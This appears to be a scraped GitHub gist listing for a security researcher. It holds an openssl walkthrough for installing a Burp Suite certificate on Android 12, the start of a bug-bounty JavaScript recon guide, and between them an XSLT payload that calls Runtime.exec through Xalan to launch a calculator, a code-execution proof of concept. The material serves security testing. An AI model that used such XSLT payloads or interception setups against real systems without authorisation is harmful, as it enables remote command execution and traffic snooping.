Skip to content

Instantly share code, notes, and snippets.

@p1v07
p1v07 / android12burp.md
Created August 11, 2023 02:10 — forked from TobiasS1402/android12burp.md
Android 12 BurpSuite intercepting

generating certificate

My android 12 does not accept the default burp certificate, you have to generate a unique certificate. Then import this into burp and use the commands to make it compatible with Android.

mkdir cert && cd cert
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca #generate ca
openssl rsa -in server.key -inform pem -out server.key.der -outform der #convert
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt #convert to pkcs8

openssl x509 -inform der -in ca.der -out ca.pem
cp ca.pem `openssl x509 -inform pem -subject_hash_old -in ca.pem | head -1`.0 #create a filename with the hash
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
@p1v07
p1v07 / JavascriptRecon.md
Created February 9, 2021 11:39
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)